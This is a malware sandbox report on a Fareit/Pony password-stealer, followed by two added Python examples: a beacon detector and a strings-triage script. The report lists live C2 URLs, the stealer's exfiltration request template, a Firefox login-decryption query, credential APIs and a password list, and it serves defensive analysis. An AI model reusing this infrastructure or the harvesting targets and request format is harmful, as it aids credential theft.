Analysis Date: 2014-01-14 16:27:05
MD5: 1f951722cfb0faa3fd6bfb16eb162a51
SHA1: 2c351ea19d1d12fd9bfa7e26310f953b4c0ad2b9

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text md5: 42ccac9fb196578bd872317b010811fe sha1: dede56e28f509c1922d3c94723e6d16c316923bd size: 70656
Section .rdata md5: 62b50172bb46ac5ad3e41d6230f4b01c sha1: c5cb30dbca14070891c54a09a7dd2abd028a7597 size: 512
Section .data md5: 9ec7533421c8f8132b1967b260897514 sha1: 0e1f332cf9be9eedea7ce9c76a9cc365fb094b1f size: 18944
Timestamp: 2013-01-20 17:33:27
PEhash: 27364e21e5b07fd14ed4de01ad97ed7556b12034
AV avira: TR/PSW.Fareit.iloen
AV avg: PSW.Generic10.BOHQ
AV msse: PWS:Win32/Fareit.gen!I
AV mcafee: PWS-Zbot.gen.aiz

Runtime Details:

Process
↳ C:\malware.exe

Registry: HKEY_CURRENT_USER\Software\WinRAR\HWID ➝ NULL
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: WininetConnectionMutex
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!

Network Details:

DNS: web187.cyberwebserver-12.de (Type: A) ➝ 212.72.183.21
DNS: simplyglutenfreemagazine.com (Type: A) ➝ 97.74.55.128
DNS: patslighting.com (Type: A) ➝ 198.252.70.200
HTTP POST: http://web187.cyberwebserver-12.de/default.php?lXrV874cBqLEg74Uf2FGh2fE
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
HTTP POST: http://web187.cyberwebserver-12.de/default.php?lXrV874cBqLEg74Uf2FGh2fE
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
HTTP POST: http://web187.cyberwebserver-12.de/default.php?lXrV874cBqLEg74Uf2FGh2fE
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
HTTP POST: http://simplyglutenfreemagazine.com/default.php?hAXCtgpvNg2Vr5FVRsOQdkh
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
HTTP POST: http://simplyglutenfreemagazine.com/default.php?hAXCtgpvNg2Vr5FVRsOQdkh
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
HTTP POST: http://simplyglutenfreemagazine.com/default.php?hAXCtgpvNg2Vr5FVRsOQdkh
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
HTTP POST: http://patslighting.com/default.php?jWSiuaVrU4bmvNEAct22El18SbOcLG4u1DJ
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
HTTP POST: http://patslighting.com/default.php?jWSiuaVrU4bmvNEAct22El18SbOcLG4u1DJ
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
HTTP POST: http://patslighting.com/default.php?jWSiuaVrU4bmvNEAct22El18SbOcLG4u1DJ
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
Flows TCP: 192.168.1.1:1031 ➝ 212.72.183.21:80
Flows TCP: 192.168.1.1:1032 ➝ 212.72.183.21:80
Flows TCP: 192.168.1.1:1033 ➝ 212.72.183.21:80
Flows TCP: 192.168.1.1:1034 ➝ 97.74.55.128:80
Flows TCP: 192.168.1.1:1035 ➝ 97.74.55.128:80
Flows TCP: 192.168.1.1:1036 ➝ 97.74.55.128:80
Flows TCP: 192.168.1.1:1037 ➝ 198.252.70.200:80
Flows TCP: 192.168.1.1:1038 ➝ 198.252.70.200:80
Flows TCP: 192.168.1.1:1039 ➝ 198.252.70.200:80
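The nine POSTs above share one request shape, and the binary's own strings carry the rest of the request template (POST %s HTTP/1.0, Accept: */*, Accept-Encoding: identity, *;q=0, Content-Encoding: binary, Content-Type: application/octet-stream, Connection: close, and the same User-Agent). The following is an added detection example, not part of the sandbox report: it reassembles that template into a constructed request (the report gives no raw request bytes, so the body is a placeholder) and scores requests against the observed traits. The per-sample query token is baked into the binary rather than generated per request, so an exact-URL signature is more precise; the regex below is the looser generalisation across the five URLs embedded in the binary. The OS-mismatch check rests on one inference: the profile paths in Runtime Details (C:\Documents and Settings\Administrator\...) place the sandbox on Windows XP/2003, while the User-Agent claims Windows 98.

```python
"""Score HTTP requests against the Fareit/Pony beacon shape seen in this report.

Added example. The sample requests are CONSTRUCTED from the report's
artifacts (observed URL and User-Agent, plus the header strings embedded in
the binary); the report itself does not reproduce raw request bytes.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

# User-Agent seen on all nine POSTs and hard-coded in the binary's strings.
BEACON_UA = "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)"

# /default.php followed by a bare 20-40 char alphanumeric token and no "key=value".
# The five URLs embedded in the binary all fit this; the token is per-sample, not per-request.
BEACON_PATH_RE = re.compile(r"/default\.php\?[A-Za-z0-9]{20,40}")


@dataclass
class Verdict:
    matched: bool
    reasons: List[str] = field(default_factory=list)


def parse_request(raw: str) -> Tuple[str, str, str, Dict[str, str], str]:
    """Split a raw HTTP/1.x request into (method, path, version, headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, path, version = lines[0].split(" ", 2)
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return method, path, version, headers, body


def score_request(raw: str, host_os: Optional[str] = None) -> Verdict:
    """Return a Verdict; matched requires the path shape plus at least two further traits.

    host_os is the OS of the sending machine if the sensor knows it (here: inferred
    as Windows XP from the sandbox's "Documents and Settings" profile paths).
    """
    method, path, version, headers, _body = parse_request(raw)
    reasons: List[str] = []
    path_hit = method == "POST" and BEACON_PATH_RE.fullmatch(path) is not None
    if path_hit:
        reasons.append("POST to /default.php with a bare alphanumeric query token")
    if version == "HTTP/1.0":
        reasons.append("HTTP/1.0 request line (binary embeds 'POST %s HTTP/1.0')")
    ua = headers.get("user-agent", "")
    if ua == BEACON_UA:
        reasons.append("hard-coded MSIE 5.0 / Windows 98 User-Agent")
    if host_os and "Windows 98" in ua and "98" not in host_os:
        reasons.append(f"User-Agent claims Windows 98 but host runs {host_os}")
    if (headers.get("content-type") == "application/octet-stream"
            and headers.get("content-encoding") == "binary"):
        reasons.append("octet-stream body declared with 'Content-Encoding: binary'")
    if headers.get("accept-encoding") == "identity, *;q=0":
        reasons.append("Accept-Encoding refuses every compressed encoding")
    # An old HTTP/1.0 client alone is not evidence; insist on the path shape plus two more traits.
    return Verdict(matched=path_hit and len(reasons) >= 3, reasons=reasons)


# CONSTRUCTED beacon: observed URL/UA plus the header strings from the binary. The body is a
# placeholder; the real body is the harvested-credential report, which this page does not show.
SAMPLE_BEACON = (
    "POST /default.php?lXrV874cBqLEg74Uf2FGh2fE HTTP/1.0\r\n"
    "Host: web187.cyberwebserver-12.de\r\n"
    "Accept: */*\r\n"
    "Accept-Encoding: identity, *;q=0\r\n"
    "Content-Encoding: binary\r\n"
    "Content-Type: application/octet-stream\r\n"
    "Content-Length: 4\r\n"
    "Connection: close\r\n"
    f"User-Agent: {BEACON_UA}\r\n"
    "\r\n"
    "\x00\x00\x00\x00"
)

# CONSTRUCTED benign request to the same script name, to show the rule needs more than the path.
SAMPLE_BENIGN = (
    "POST /default.php?action=login HTTP/1.1\r\n"
    "Host: example.test\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Content-Length: 8\r\n"
    "User-Agent: Mozilla/5.0\r\n"
    "\r\n"
    "user=bob"
)


if __name__ == "__main__":
    for label, raw in (("beacon", SAMPLE_BEACON), ("benign", SAMPLE_BENIGN)):
        v = score_request(raw, host_os="Windows XP")
        print(f"{label}: matched={v.matched}")
        for r in v.reasons:
            print("   -", r)
```

Three of the six traits (HTTP/1.0, the Accept-Encoding value, the octet-stream/binary pair) are cheap to check at a proxy or IDS and survive a C2 domain change; the User-Agent string and the path shape are the ones an operator would rotate first.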

Strings:
jjjj
jjjjjj
pSettings
000000
{%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}
111111
11111111
112233
123123
123321
123456
1234567
12345678
123456789
1234567890
123abc
123qwe
1q2w3e
1q2w3e4r
'2, /+0&7!4-)1#
222222
2.5.29.37
\32BitFtp.ini
;3+#>6.&
\3D-FTP
3D-FTP
654321
666666
{74FF1730-B1F2-4D88-926B-1568FAE61DB7}
7777777
9|$4r4
9D$(ub
aaaaaa
abc123
abcd.bat
Accept: */*
Accept-Encoding: identity, *;q=0
account.cfg
account.cfn
\Accounts
accounts.ini
\AceBIT
addrbk.dat
adidas
AdjustTokenPrivileges
Administrative Tools
advapi32.dll
AllocateAndInitializeSid
amanda
andrew
angel1
angels
anthony
aPLib v1.01  -  the smaller the better :)
AppData
AppDir
asdfasdf
asdfgh
ashley
asshole
austin
bailey
banana
bandit
baseball
\BatMail
batman
benjamin
billgates
biteme
\BitKinex
bitkinex.ds
blabla
blahblah
BlazeFtp
\BlazeFtp
blessed
blessing
blink182
bookmark.dat
\Bromium
bubbles
\BulletProof Software
buster
Buttons
canada
cassie
CertCloseStore
CertEnumCertificatesInStore
CertOpenSystemStoreA
charlie
CheckTokenMembership
cheese
chelsea
chicken
christ
\ChromePlus
\Chromium
church
Client Hash
CloseHandle
closesocket
CLSID\{11C1D741-A95B-11d2-8A80-0080ADB32FF4}\InProcServer32
cocacola
CoCreateGuid
CoCreateInstance
\CoffeeCup Software
Common Administrative Tools
Common AppData
Common Documents
\Comodo
compaq
computer
Config Path
connect
Connection: close
Connections.txt
CONSTRAINT
Content-Encoding: binary
Content-Length:
Content-Length: %lu
Content-Type: application/octet-stream
ConvertSidToStringSidA
cookie
Cookies
Copyright (c) 1998-2009 by Joergen Ibsen, All Rights Reserved.
corvette
CoTaskMemFree
CreateDirectoryA
CreateFileA
CreateFileMappingA
CreateStreamOnHGlobal
CreateToolhelp32Snapshot
creative
CredentialCheck
CredentialSalt
CredEnumerateA
CredFree
crypt32.dll
CryptAcquireCertificatePrivateKey
CryptDestroyKey
CryptExportKey
CryptGetUserKey
CryptReleaseContext
CryptUnprotectData
\CuteFTP
CUTEFTP
\Cyberduck
D$0;D$(
dakota
dallas
daniel
danielle
@.data
DataDir
DataDirBak
DataFolder
DataPath
Default
DEFDIR
 del 	  %0 
 del 	%1  
DeleteFileA
DeluxeFTP
destiny
dexter
diamond
digital
Dir #%d
Directory
DisplayName
+D$P][_^
DPAPI: 
dragon
\drives.js
EasyFTP
EmailAddress
eminem
emmanuel
\Epic\Epic
ESTdb2.dat
\Estsoft\ALFTP
ExitProcess
ExpandEnvironmentStringsA
\ExpanDrive
ExpanDrive_Home
explorer.exe
FastStone Browser
Favorites.dat
\FileZilla
\filezilla.xml
FindClose
FindFirstFileA
FindNextFileA
Firefox
fireFTPsites.dat
\FlashFXP\3
\FlashFXP\4
\Flock\Browser\
flower
Folder
foobar
football
football1
FOREIGN
forever
freedom
FreeSid
FreshFTP
friend
friends
\Frigate3
FSProtocol
ftp://
FTP Commander
FTPCON
FTP CONTROL
FTP Count
FTP destination catalog
FTP destination password
FTP destination port
FTP destination server
FTP destination user
FtpDirectory
\FTP Explorer
FTP File%d
\FTPGetter
\FTPInfo
FtpIniName
ftplast.osd
FTP++.Link\shell\open\command
FTPList.db
ftplist.txt
FTP Navigator
FTPNow
FTP Now
FtpPassword
_FtpPassword
FtpPort
FTP profiles
\FTPRush
FtpServer
FTPShell
ftpshell.fsi
ftpsite.ini
FtpSite.xml
FtpUserName
FTPVoyager.ftp
FTPVoyager.qc
fuckoff
fuckyou
fuckyou1
full address:s:
gateway
genesis
george
GetCurrentDirectoryA
GetCurrentProcess
GetFileAttributesA
GetFileSize
GetHGlobalFromStream
gethostbyname
GetLastError
GetLocaleInfoA
GetModuleFileNameA
GetModuleHandleA
GetNativeSystemInfo
GetPrivateProfileIntA
GetPrivateProfileSectionNamesA
GetPrivateProfileStringA
GetProcAddress
GetSystemInfo
GetTempPathA
GetTickCount
GetTokenInformation
GetUserNameA
GetVersionExA
GetWindowsDirectoryA
gfhjkm
ghbdtn
\GHISLER
ginger
\Global Downloader
GlobalLock
\GlobalSCAPE\CuteFTP
\GlobalSCAPE\CuteFTP Lite
\GlobalSCAPE\CuteFTP Pro
GlobalUnlock
google
\Google\Chrome
\GPSoftware\Directory Opus
guitar
hahaha
hannah
hardcore
harley
heaven
hello1
helpme
History
\History.dat
History.dat
hockey
HostAdrs
HostDirName
Hostname
HostName
Host: %s
hotdog
http://
http://cms.foodbook.pk/default.php?c82fFCEqryrEQ5OctPxuiAQqWFFCNN6Shm5Z
<HTTPMail_Password2
HTTPMail Password2
HTTPMail Server
HTTPMail User Name
HTTP Password
http://patslighting.com/default.php?jWSiuaVrU4bmvNEAct22El18SbOcLG4u1DJ
https://
HTTP Server URL
http://simplyglutenfreemagazine.com/default.php?hAXCtgpvNg2Vr5FVRsOQdkh
HTTP User
http://web187.cyberwebserver-12.de/default.php?lXrV874cBqLEg74Uf2FGh2fE
http://worldwidehat.com/default.php?Duj1JNAoXtCHSG2xVCNy3LYsPh5WoNm2F2t
hunter
identification
identities
Identities
identitymgr
	if 		 exist 	   %1  	  goto 	
	 :ijk 
ilovegod
iloveyou
iloveyou!
iloveyou1
iloveyou2
IMAP Password
<IMAP_Password2
IMAP Password2
IMAP Port
IMAP Server
IMAP User
IMAP User Name
ImpersonateLoggedOnUser
inet_addr
inetcomm server passwords
InitialDirectory
InitialPath
\INSoftware\NovaFTP
InstallDir
Install_Dir
InstallDir1
InstallerDathPath
installpath
InstallPath
Install Path
internet
InternetCrackUrlA
InternetCreateUrlA
Internet Explorer
\Ipswitch
\Ipswitch\WS_FTP
IsRelative
IsTextUnicode
IsWow64Process
jasmine
jasper
jennifer
jessica
jesus1
john316
jordan
jordan23
joseph
joshua
junior
justin
kernel32.dll
killer
kitten
\K-Meleon
K-Meleon
knight
L$(9L$@
LastAddress
Last Directory3
Last Install Path
LastPassword
LastPort
Last Server Host
Last Server Pass
Last Server Path
Last Server Port
Last Server Type
Last Server User
LastSessionFile
LastUser
LCMapStringA
leapftp
\LeapWare\LeapFTP
letmein
LoadLibraryA
LoadUserProfileA
LocalAlloc
Local AppData
LocalDir
LocalFree
Location:
Login Data
logins
LogonUserA
london
looking
LookupPrivilegeValueA
lovely
loving
+L$PRQW
lstrcatA
lstrcmpA
lstrcmpiA
lstrcpyA
lstrlenA
lstrlenW
maggie
Mailbox.ini
\MapleStudio\ChromePlus
MapViewOfFile
master
matrix
matthew
maverick
maxwell
merlin
michael
michelle
mickey
microsoft
\Microsoft\Windows Live Mail
\Microsoft\Windows Mail
Microsoft_WinInet_*
monkey
More information: http://www.ibsensoftware.com/
mother
Mozilla
\Mozilla\Firefox\
\Mozilla\Profiles\
\Mozilla\SeaMonkey\
mozsqlite3.dll
msi.dll
MS IE FTP Passwords
MsiGetComponentPathA
muffin
MultiByteToWideChar
mustang
mustdie
My Documents
My FTP
mylove
My Pictures
myspace1
nathan
NDSites.ini
netapi32.dll
NetApiBufferFree
\NetDrive
\NetSarang
NetUserEnum
NexusFile
\Nichrome
nicole
nintendo
NNTP Email Address
NNTP Password
NNTP Password2
NNTP Server
NNTP User Name
\Notepad++
nothing
NovaFTP.db
NppFTP.xml
nss3.dll
NSSBase64_DecodeBuffer
NSS_Init
NSS_Shutdown
.oeaccount
ole32.dll
OleInitialize
onelove
online
OpenProcess
OpenProcessToken
Opera.HTML\shell\open\command
orange
origin_url
Outlook
outlook account manager passwords
passw0rd
password
"password" : "
Password
_Password
PassWord
password1
password 51:b:
PasswordType
password_value
PathToExe
peaches
peanut
pepper
Personal
PK11_Authenticate
PK11_FreeSlot
PK11_GetInternalKeySlot
PK11SDR_Decrypt
\Pocomail
\PocoSystem.ini
pokemon
POP3 Password
<POP3_Password2
POP3 Password2
POP3 Port
POP3 Server
POP3 User
POP3 User Name
PopAccount
PopPassword
PopPort
PopServer
PortNumber
POST %s HTTP/1.0
PPh=pA
praise
prayer
prefs.js
PRIMARY
prince
princess
Process32First
Process32Next
ProcessIdToSessionId
Profile
\Profiles
profiles.ini
profiles.xml
Program
ProgramDir
project.ini
PSQRWV
pstorec.dll
PStoreCreateInstance
purple
qazwsx
QCHistory
QData.dat
quick.dat
\Quick.dat
qwerty
qwerty1
rachel
rainbow
`.rdata
ReadFile
\recentservers.xml
red123
RegCloseKey
RegCreateKeyA
RegEnumKeyExA
RegEnumValueA
RegOpenCurrentUser
RegOpenKeyA
RegOpenKeyExA
RegQueryValueExA
RegSetValueExA
RemoteDir
Remote Dir
RemoteDirectory
RevertToSelf
\RhinoSoft.com
richard
robert
\RockMelt
RootDirectory
rotimi
RushSite.xml
    "%s"   
S-1-5-18
samantha
samuel
scooby
scooter
SeaMonkey
SeAssignPrimaryTokenPrivilege
SeBackupPrivilege
SeChangeNotifyPrivilege
SECITEM_FreeItem
SeCreateTokenPrivilege
secret
SeImpersonatePrivilege
SeIncreaseQuotaPrivilege
select
SELECT hostname, encryptedUsername, encryptedPassword FROM moz_logins
SeRestorePrivilege
Server
Server.Host
ServerList.xml
ServerName
Server.Pass
Server.Port
servers.xml
ServerType
Server Type
Server.User
\Sessions
SeTcbPrivilege
SetCurrentDirectoryA
setsockopt
<setting name="
SetUnhandledExceptionFilter
shadow
shalom
\SharedSettings_1_0_5.ccs
\SharedSettings_1_0_5.sqlite
\SharedSettings.ccs
\SharedSettings.sqlite
shell32.dll
ShellExecuteA
SHGetFolderPathA
shlwapi.dll
signons2.txt
signons3.txt
signons.sqlite
signons.txt
silver
single
site.dat
\SiteDesigner
SiteInfo.QFP
\sitemanager.xml
\Sites
Sites\
sites.dat
\Sites.dat
sites.db
SitesDir
SiteServer %d\Host
SiteServer %d\Remote Directory
SiteServer %d\SFTP
SiteServer %d-User
SiteServer %d-User PW
SiteServer %d\WebUrl
SiteServers
sites.ini
\sites.xml
sites.xml
%s\Keychain
slayer
SM.arch
\SmartFTP
\sm.dat
smokey
SmtpAccount
SMTP Email Address
SmtpPassword
SMTP Password
<SMTP_Password2
SMTP Password2
SmtpPort
SMTP Port
SmtpServer
SMTP Server
SMTP User
SMTP User Name
snoopy
soccer
soccer1
socket
Software\AceBIT
Software\Adobe\Common
Software\BPFTP
Software\BPFTP\Bullet Proof FTP\Main
Software\BPFTP\Bullet Proof FTP\Options
Software\BulletProof Software\BulletProof FTP Client\Main
Software\BulletProof Software\BulletProof FTP Client\Options
Software\ChromePlus
SOFTWARE\Classes\TypeLib\{9EA55529-E122-4757-BC79-E4825F80732C}
SOFTWARE\Classes\TypeLib\{CB1F2C0F-8094-4AAC-BCF5-41A64E27F777}
SOFTWARE\Classes\TypeLib\{F9043C88-F6F2-101A-A3C9-08002B2F49FB}\1.2\0\win32
Software\CoffeeCup Software
Software\CoffeeCup Software\Internet\Profiles
Software\Cryer\WebSitePublisher
Software\ExpanDrive
Software\ExpanDrive\Sessions
Software\Far2\Plugins\FTP\Hosts
Software\Far2\SavedDialogHistory\FTPHost
Software\Far Manager\Plugins\FTP\Hosts
Software\Far Manager\SavedDialogHistory\FTPHost
Software\Far\Plugins\FTP\Hosts
Software\Far\SavedDialogHistory\FTPHost
Software\FileZilla
Software\FileZilla Client
Software\FlashFXP
Software\FlashFXP\3
Software\FlashFXP\4
Software\FlashPeak\BlazeFtp\Settings
Software\FTPClient\Sites
Software\FTP Explorer\FTP Explorer\Workspace\MFCToolBar-224
Software\FTP Explorer\Profiles
Software\FTPWare\COREFTP\Sites
Software\Ghisler\Total Commander
Software\Ghisler\Windows Commander
Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbar
Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbar
Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbar
Software\IncrediMail
SOFTWARE\LeapWare
Software\LeechFTP
Software\LinasFTP\Site Manager
Software\Martin Prikryl
Software\MAS-Soft\FTPInfo\Setup
Software\Microsoft\Internet Account Manager
Software\Microsoft\Internet Account Manager\Accounts
Software\Microsoft\Internet Explorer\IntelliForms\Storage2
Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Software\Microsoft\Windows Live Mail
Software\Microsoft\Windows Mail
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
Software\Mozilla
Software\NCH Software\ClassicFTP\FTPAccounts
SOFTWARE\NCH Software\Fling\Accounts
Software\Nico Mak Computing\WinZip\FTP
Software\Nico Mak Computing\WinZip\mru\jobs
_Software\Opera Software
Software\Poco Systems Inc
Software\RimArts\B2\Settings
Software\RIT\The Bat!
Software\RIT\The Bat!\Users depot
SOFTWARE\Robo-FTP 3.7\FTPServers
SOFTWARE\Robo-FTP 3.7\Scripts
Software\SimonTatham\PuTTY\Sessions
Software\SoftX.org\FTPClient\Sites
Software\Sota\FFFTP
Software\Sota\FFFTP\Options
Software\South River Technologies\WebDrive\Connections
Software\TurboFTP
Software\VanDyke\SecureFX
Software\WinRAR
sparky
spirit
sqlite3_close
sqlite3_column_blob
sqlite3_column_bytes
sqlite3.dll
sqlite3_open
sqlite3_prepare
sqlite3_step
SQLite format 3
Staff-FTP
startrek
starwars
STATUS-IMPORT-OK
stella
StgOpenStorage
StrCmpNIA
StrRChrIA
StrStrA
StrStrIA
StrStrIW
StrToIntA
summer
sunshine
superman
SVWhTPA
SWPXh'
t9h>\A
tahj]A
taylor
tchjTA
Technology
tEhhbA
tEhLjA
tEhUbA
tEhxkA
TerminalType
TERMSRV/
TERMSRV/*
testing
testtest
tFhecA
tFhWIA
tGhkfA
tGhyfA
t$h7gA
\The Bat!
t)h*fA
t)h#fA
t$h/gA
!This program cannot be run in DOS mode.
thomas
t>h@PA
t$hPfA
t;h$RA
t$huaA
thunder
Thunderbird
\Thunderbird
t=hWIA
t-hWIA
t.hWIA
t(hWIA
t$h>YA
t%h,ZA
tigger
tKhnYA
trinity
trustno1
\TurboFTP
UltraFXP
uM9l$D}G
UninstallString
UNIQUE
unleap.exe
UnloadUserProfile
UnmapViewOfFile
user32.dll
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
user.config
userenv.dll
UserID
Username
UserName
username:s:
username_value
v89l$D|0
value="
\VanDyke\Config\Sessions
victory
\Visicom Media
VWPSQR
wand.dat
wcx_ftp.ini
Web Data
welcome
whatever
WideCharToMultiByte
william
windows
winex="
WinFTP
WininetCacheCredentials
wininet.dll
\win.ini
winner
wisdom
wiseftp.ini
wiseftpsrvs.bin
wiseftpsrvs.ini
Wk;dZ3lLHxJ
Working Directory
WriteFile
WSAStartup
WS_FTP
wsock32.dll
wsprintfA
WTSGetActiveConsoleSessionId
xflags
\Yandex
YUIPWDFILE0YUIPKDFILE0YUICRYPTED0YUI1.0
zxcvbnm
^_ZY[X
ZY[X_^
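The Strings section reads as a credential stealer's working set: five C2 URLs of the shape contacted above (two of them, cms.foodbook.pk and worldwidehat.com, were not contacted in this run); registry paths and file names for dozens of FTP, mail and browser clients; the SQLite query SELECT hostname, encryptedUsername, encryptedPassword FROM moz_logins together with the NSS import PK11SDR_Decrypt needed to decrypt Firefox logins; CryptUnprotectData and CredEnumerateA for DPAPI- and Credential-Manager-protected secrets; NetUserEnum, LogonUserA and ImpersonateLoggedOnUser next to a long list of common passwords, which is consistent with trying those passwords against local accounts; what look like the fragments (del %0, if exist %1 goto, :ijk, abcd.bat) of a self-deleting batch file; and the server acknowledgement string STATUS-IMPORT-OK. The script below is an added triage example, not part of the report, that sorts such a dump into those classes and diffs the embedded C2 hosts against the ones observed in Network Details. Its input is a constructed excerpt of this page's strings, and the wordlist heuristic deliberately over-matches (it sweeps in short imports such as connect), so its count is a signal to look at, not a list to trust.

```python
"""Triage a strings dump of a credential stealer and diff embedded vs observed C2.

Added example. STRINGS_EXCERPT is a CONSTRUCTED subset of this report's Strings
section; OBSERVED_C2_HOSTS is taken from its Network Details.
"""
import re
from typing import Dict, Iterable, List, Set
from urllib.parse import urlsplit

# CONSTRUCTED excerpt of the page's Strings section, one entry per class of interest.
STRINGS_EXCERPT: List[str] = [
    "http://cms.foodbook.pk/default.php?c82fFCEqryrEQ5OctPxuiAQqWFFCNN6Shm5Z",
    "http://patslighting.com/default.php?jWSiuaVrU4bmvNEAct22El18SbOcLG4u1DJ",
    "http://simplyglutenfreemagazine.com/default.php?hAXCtgpvNg2Vr5FVRsOQdkh",
    "http://web187.cyberwebserver-12.de/default.php?lXrV874cBqLEg74Uf2FGh2fE",
    "http://worldwidehat.com/default.php?Duj1JNAoXtCHSG2xVCNy3LYsPh5WoNm2F2t",
    r"Software\FileZilla Client",
    r"Software\SimonTatham\PuTTY\Sessions",
    r"Software\Microsoft\Internet Explorer\IntelliForms\Storage2",
    r"_Software\Opera Software",
    "SELECT hostname, encryptedUsername, encryptedPassword FROM moz_logins",
    "signons.sqlite",
    "CryptUnprotectData",
    "PK11SDR_Decrypt",
    "CredEnumerateA",
    "LogonUserA",
    "NetUserEnum",
    "ImpersonateLoggedOnUser",
    "123456",
    "password",
    "qwerty",
    "trustno1",
    "iloveyou",
    "connect",  # Winsock import: shows that the wordlist heuristic over-matches
    "STATUS-IMPORT-OK",
    "User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)",
    "aPLib v1.01  -  the smaller the better :)",
]

# Hosts actually contacted during the run, per the report's Network Details.
OBSERVED_C2_HOSTS: Set[str] = {
    "web187.cyberwebserver-12.de",
    "simplyglutenfreemagazine.com",
    "patslighting.com",
}

# Imports used to recover stored secrets (DPAPI, Credential Manager, Firefox NSS, Protected Storage).
SECRET_DECRYPT_APIS = {
    "CryptUnprotectData", "CredEnumerateA", "PK11SDR_Decrypt", "NSS_Init",
    "NSSBase64_DecodeBuffer", "PStoreCreateInstance", "CryptExportKey",
}
# Imports that, next to a password list, point at logon attempts against local accounts.
LOCAL_LOGON_APIS = {"LogonUserA", "NetUserEnum", "ImpersonateLoggedOnUser", "LoadUserProfileA"}
PROTOCOL_MARKERS = {"STATUS-IMPORT-OK"}

C2_URL_RE = re.compile(r"^https?://[^/\s]+/default\.php\?[A-Za-z0-9]{20,40}$")
REG_PATH_RE = re.compile(r"^_?Software\\", re.IGNORECASE)  # the dump has "_Software\Opera Software"
# Lowercase/digit tokens of wordlist length. Deliberately loose: short imports like "connect"
# land here too, so treat the bucket size as a signal, not as a clean wordlist.
WORDLIST_RE = re.compile(r"^[a-z0-9!]{6,10}$")

BUCKETS = ("c2_urls", "registry_paths", "sql_queries", "secret_decrypt_apis",
           "local_logon_apis", "protocol_markers", "wordlist_like", "other")


def triage(strings: Iterable[str]) -> Dict[str, List[str]]:
    """Sort each string into the first bucket it fits, preserving dump order."""
    out: Dict[str, List[str]] = {name: [] for name in BUCKETS}
    for s in strings:
        if C2_URL_RE.match(s):
            out["c2_urls"].append(s)
        elif REG_PATH_RE.match(s):
            out["registry_paths"].append(s)
        elif s.upper().startswith("SELECT "):
            out["sql_queries"].append(s)
        elif s in SECRET_DECRYPT_APIS:
            out["secret_decrypt_apis"].append(s)
        elif s in LOCAL_LOGON_APIS:
            out["local_logon_apis"].append(s)
        elif s in PROTOCOL_MARKERS or s.startswith("User-Agent:"):
            out["protocol_markers"].append(s)
        elif WORDLIST_RE.match(s):
            out["wordlist_like"].append(s)
        else:
            out["other"].append(s)
    return out


def embedded_c2_hosts(buckets: Dict[str, List[str]]) -> Set[str]:
    """Hostnames of every C2 URL found in the dump."""
    return {urlsplit(u).hostname for u in buckets["c2_urls"]}


def unobserved_c2_hosts(buckets: Dict[str, List[str]],
                        observed: Set[str] = OBSERVED_C2_HOSTS) -> Set[str]:
    """Embedded C2 hosts the sandbox run never reached: infrastructure to block and watch for."""
    return embedded_c2_hosts(buckets) - observed


if __name__ == "__main__":
    b = triage(STRINGS_EXCERPT)
    for name in BUCKETS:
        print(f"{name:20s} {len(b[name]):3d}  {b[name][:3]}")
    print("embedded but not contacted:", sorted(unobserved_c2_hosts(b)))
```

The diff of embedded against observed hosts is the part worth automating: a sandbox run shows only the servers the sample happened to reach, while the static list is the full set the operator provisioned.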